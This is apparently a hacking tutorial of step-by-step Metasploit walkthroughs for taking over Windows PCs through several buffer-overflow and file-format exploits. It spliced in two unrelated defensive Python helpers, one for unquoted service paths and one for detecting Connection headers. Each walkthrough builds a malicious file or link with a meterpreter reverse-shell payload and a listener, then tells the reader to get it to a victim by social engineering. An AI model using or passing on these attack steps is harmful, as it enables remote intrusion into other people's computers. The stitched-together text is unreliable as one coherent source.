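    each space is a possible end of the executable name, and .exe is appended when the
    candidate has no extension. The first path that exists is the one executed. Enumeration
    stops at the first token that already ends in .exe (assumed to be the real binary;
    what follows is treated as arguments)."""
    if image_path.startswith('"'):
        return [image_path[1:image_path.index('"', 1)]]   # quoted: only one interpretation
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        candidates.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
        if tokens[i - 1].lower().endswith(".exe"):
            break
    return candidates


def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when more than one path could be executed for this ImagePath."""
    return len(candidate_paths(image_path)) > 1


def quote_image_path(image_path: str) -> str:
    """Remediation: wrap the executable in quotes so only one path is possible; arguments are kept."""
    if image_path.startswith('"'):
        return image_path
    exe = candidate_paths(image_path)[-1]
    if not image_path.lower().startswith(exe.lower()):
        raise ValueError("could not locate the executable token; quote this path by hand")
    return '"' + exe + '"' + image_path[len(exe):]


def audit_services(services: dict) -> list:
    """Sorted names of services whose ImagePath is unquoted and contains spaces."""
    return sorted(name for name, path in services.items() if is_unquoted_with_spaces(path))


if __name__ == "__main__":
    for name in audit_services(SAMPLE_SERVICES):
        path = SAMPLE_SERVICES[name]
        print(name, "tries:", candidate_paths(path))
        print(name, "fix:  ", quote_image_path(path))
```

For the page's own example the helper returns C:\program.exe before C:\program files\hello.exe, which is exactly the order in which the API resolves the name. The fix on the defender's side is the quoted ImagePath together with directory permissions that keep unprivileged users from writing into C:\ and C:\Program Files.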


Attacking a Remote Windows PC using the Winamp MAKI Buffer Overflow:

This module exploits a stack-based buffer overflow in Winamp 5.55. The flaw exists in gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used in an insecure way with user-controlled data. To exploit the vulnerability the attacker must convince the victim to install the generated mcvcore.maki file in the “scripts” directory of the default “Bento” skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/winamp_maki_bof
msf exploit(winamp_maki_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(winamp_maki_bof) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(winamp_maki_bof) > exploit

After the malicious maki file has been generated successfully, it is stored on your local computer at /root/.msf4/local/mcvcore.maki

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

Now send your mcvcore.maki file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.


Attacking a Remote Windows PC using the Microsoft Office Word MS12-027 MSCOMCTL ActiveX Buffer Overflow:

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild in April 2012. This module targets Office 2007 and Office 2010. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after Office has loaded, so the malicious file must be loaded through “File / Open” to achieve exploitation.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms12_027_mscomctl_bof) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(ms12_027_mscomctl_bof) > exploit

After the malicious doc file has been generated successfully, it is stored on your local computer at /root/.msf4/local/msf.doc

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


Now send your msf.doc file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.

Attacking a Remote Windows PC Using GlobalSCAPE CuteZIP Stack Buffer Overflow:

This module exploits a stack-based buffer overflow vulnerability in version 2.1 of CuteZIP. In order for the command to be executed, an attacker must convince the target user to open a specially crafted zip file with CuteZIP. By doing so, an attacker can execute arbitrary code as the target user.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/cutezip_bof
msf exploit(cutezip_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(cutezip_bof) > set lhost 192.168.42.131 (IP of Local Host)
msf exploit(cutezip_bof) > exploit

After the malicious ZIP file is generated successfully, it is stored on your local computer at /root/.msf4/local/msf.zip

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


Now send your msf.zip file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.

Attacking a Remote Windows PC Using Simple Web Server Connection Header Buffer Overflow:

This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string in the Connection header to cause an overflow on the stack when the function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/http/sws_connection_bof
msf exploit(sws_connection_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(sws_connection_bof) > set lhost 192.168.42.131 [IP of Local Host]
msf exploit(sws_connection_bof) > set rhost 192.168.1.7 [IP of Victim PC]
msf exploit(sws_connection_bof) > exploit

The URL to give to the victim is http://192.168.42.131

Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” to list the sessions, then connect to the session by its number.
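From the defender's side, the Connection header abuse described above stands out in HTTP traffic or proxy logs, because a legitimate Connection value is a short list of tokens such as keep-alive or close. The following is an added example (not part of this tutorial or of the Metasploit module) that parses raw HTTP/1.1 requests constructed inline and flags a Connection header that is far longer than any real token list, or that is not a token list at all; the 64-byte threshold is an assumed policy value.

```python
import re
from typing import Dict, List

# Constructed sample requests (not captured traffic). The second carries an
# oversized Connection header of the kind this exploit sends; the fourth
# carries a value that is not a valid token list at all.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: 192.168.1.7\r\nConnection: keep-alive\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 192.168.1.7\r\nConnection: " + "A" * 2048 + "\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 192.168.1.7\r\nconnection: close\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 192.168.1.7\r\nConnection: keep-alive; x=1\r\n\r\n",
]

# Legitimate Connection values are short comma-separated tokens such as
# "keep-alive", "close" or "Upgrade". The 64-byte limit is an assumed policy
# value: generous for real traffic, far below what an overflow needs.
MAX_CONNECTION_LEN = 64
TOKEN = r"[A-Za-z0-9!#$%&'*+.^_`|~-]+"
TOKEN_LIST = re.compile(rf"^{TOKEN}(\s*,\s*{TOKEN})*$")

def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Split a raw HTTP/1.x request into a lower-cased header name -> values map."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, List[str]] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" not in line:
            continue  # tolerate malformed lines rather than crash the scanner
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers

def inspect_request(raw: str) -> List[str]:
    """Return findings for one request; an empty list means nothing suspicious."""
    findings: List[str] = []
    for value in parse_headers(raw).get("connection", []):
        if len(value) > MAX_CONNECTION_LEN:
            findings.append(f"connection header too long ({len(value)} bytes)")
        elif not TOKEN_LIST.match(value):
            findings.append("connection header is not a token list")
    return findings

def scan(requests: List[str]) -> List[List[str]]:
    """Inspect every request and return the findings in the same order."""
    return [inspect_request(r) for r in requests]

if __name__ == "__main__":
    for req, result in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(req.split("\r\n")[0], "->", result or "ok")
```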


Attacking a Remote Windows 7 PC Using Microsoft XML Core Services MSXML Uninitialized Memory Corruption:

This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory, allowing remote code execution.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/msxml_get_definition_code_exec
msf exploit(msxml_get_definition_code_exec) > set payload windows/meterpreter/reverse_tcp
msf exploit(msxml_get_definition_code_exec) > set lhost 192.168.42.131 (IP of Local Host)
msf exploit(msxml_get_definition_code_exec) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(msxml_get_definition_code_exec) > set uripath / (The URL path to use for this exploit)
msf exploit(msxml_get_definition_code_exec) > exploit

The URL to give to the victim is http://192.168.42.131:8080/

Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” to list the sessions, then connect to the session by its number.


Attacking a Remote Windows 7 PC Using Poison Ivy 2.3.2 C&C Server Buffer Overflow:

This module exploits a stack buffer overflow in the Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default ‘admin’ password, the exploit should work fine. If the C&C is configured with another password, the exploit can fail. The ‘check’ command can be used to determine whether the C&C target is using the default ‘admin’ password. Hopefully an exploit attempt won't crash the Poison Ivy C&C process, just the thread responsible for handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is set, a random header is used. If the bruteforce target is selected, a random header is sent in case the default for the ‘admin’ password doesn't work. Bruteforcing stops after 5 tries or once a session is obtained.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(poisonivy_bof) > set lhost 192.168.42.131 (IP of Local Host)
msf exploit(poisonivy_bof) > set rhost 192.168.12.119 (IP of Victim PC)
msf exploit(poisonivy_bof) > exploit

The URL to give to the victim is http://192.168.42.131

Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” to list the sessions, then connect to the session by its number.


Attacking a Remote Windows PC Using Apple QuickTime TeXML Stack Buffer Overflow:

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution in the context of the user. The flaw is generally known as a bug in processing the ‘transform’ attribute; however, that attack vector seems to only cause a TerminateProcess call due to a corrupt stack cookie, and more data will only trigger a warning about the malformed XML file. This module exploits the ‘color’ value instead, which accomplishes the same thing.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/apple_quicktime_texml
msf exploit(apple_quicktime_texml) > set payload windows/meterpreter/reverse_tcp
msf exploit(apple_quicktime_texml) > set lhost 192.168.42.131 (IP of Local Host)
msf exploit(apple_quicktime_texml) > set srvhost 192.168.1.3 (Victim IP)
msf exploit(apple_quicktime_texml) > show targets
msf exploit(apple_quicktime_texml) > set target 0
msf exploit(apple_quicktime_texml) > exploit

After the malicious file is generated successfully, it is stored on your local computer at /root/.msf4/local/msf.xml

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.


Now send your msf.xml file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.

Attacking a Remote Windows PC Using Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability:

This module exploits a vulnerability found in Microsoft Office's ClickOnce feature. When handling a macro document, the application fails to recognize certain file extensions as dangerous executables, which can be used to bypass the warning message. This allows you to trick your victim into opening the malicious document, which will load up either a Python or Ruby payload of your choosing, and then finally download and execute our executable.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/ms12_005
msf exploit(ms12_005) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms12_005) > set lhost 192.168.42.131 (IP of Local Host)
msf exploit(ms12_005) > exploit

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


After the malicious document file is generated successfully, it is stored on your local computer at /root/.msf4/local/msf.docm

Now send your msf.docm file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.


Tnx All Dears For Reading This Article

By Red H4t V!per